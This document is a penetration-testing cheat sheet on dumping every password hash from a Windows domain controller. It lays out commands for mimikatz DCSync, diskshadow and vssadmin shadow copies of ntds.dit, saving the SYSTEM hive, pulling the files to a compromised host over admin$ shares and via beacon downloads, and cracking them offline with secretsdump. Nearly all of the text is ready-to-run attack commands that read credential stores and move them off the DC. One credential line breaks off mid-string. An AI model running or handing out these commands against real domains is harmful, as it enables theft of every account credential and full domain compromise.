1. DCSync: dump every hash in the domain

mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:test.local /all /csv" "exit"

Each mimikatz command is passed as its own quoted argument. DCSync needs an account holding the replication rights (Domain Admins, or "Replicating Directory Changes" plus "Replicating Directory Changes All"); it pulls the hashes over the directory replication protocol, so nothing has to be copied off the DC, but replication requests from a non-DC host are a well-known detection.

[Domain Penetration] Dumping hashes from a Windows domain controller

2. diskshadow (change to the system32 directory before running it)

Type the following at the DISKSHADOW> prompt (or save the lines to a text file and run diskshadow.exe /s file.txt):

diskshadow.exe
set context persistent nowriters
add volume c: alias stack
create
expose %stack% z:
exec "cmd.exe" /c copy z:\windows\ntds\ntds.dit c:\windows\temp\ntds.dit
delete shadows all
list shadows all
reset
exit

Then save the SYSTEM hive, which holds the boot key needed to decrypt ntds.dit:

reg save hklm\system c:\windows\temp\system.hive

beacon> download ntds.dit

beacon> download system.hive


Pull the two files from the DC back to the compromised host (admin$ is C:\Windows on the DC, so admin$\temp is the C:\Windows\Temp directory written to above):

net use \\192.168.75.129\c$ /user:"yiwang\Adminis

move \\192.168.75.129\admin$\temp\ntds.dit c:\windows\temp\

move \\192.168.75.129\admin$\temp\system.hive c:\windows\temp\

net use * /del /yes 

3. Decrypt with impacket's secretsdump.py

python secretsdump.py -system system.hive -ntds ntds.dit LOCAL >>hash.txt

LOCAL tells secretsdump to parse the files offline instead of connecting to a host. Each account is printed as domain\user:rid:lmhash:nthash::: ; add -history to also dump previous passwords.


 

4. vssadmin: offline hash dump

vssadmin list shadows
vssadmin create shadow /for=c:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy65\windows\NTDS\ntds.dit c:\windows\temp\ntds.dit
vssadmin delete shadows /for=c: /quiet
esentutl /p /o c:\windows\temp\ntds.dit
reg save hklm\system c:\windows\temp\system.hive

The HarddiskVolumeShadowCopy65 device name is taken from the "Shadow Copy Volume Name" line that vssadmin create prints; the number differs on every host, so read it from the output rather than copying it from here. vssadmin create shadow only exists on Windows Server editions, which is fine for a domain controller. delete shadows /for=c: removes every shadow copy of C:, not just the one created above, so on a host with existing restore points delete by ID instead. esentutl /p repairs the copied database, which is usually in a dirty state because it was snapshotted while in use.


 

Reference:

https://xz.aliyun.com/t/2527#toc-1 
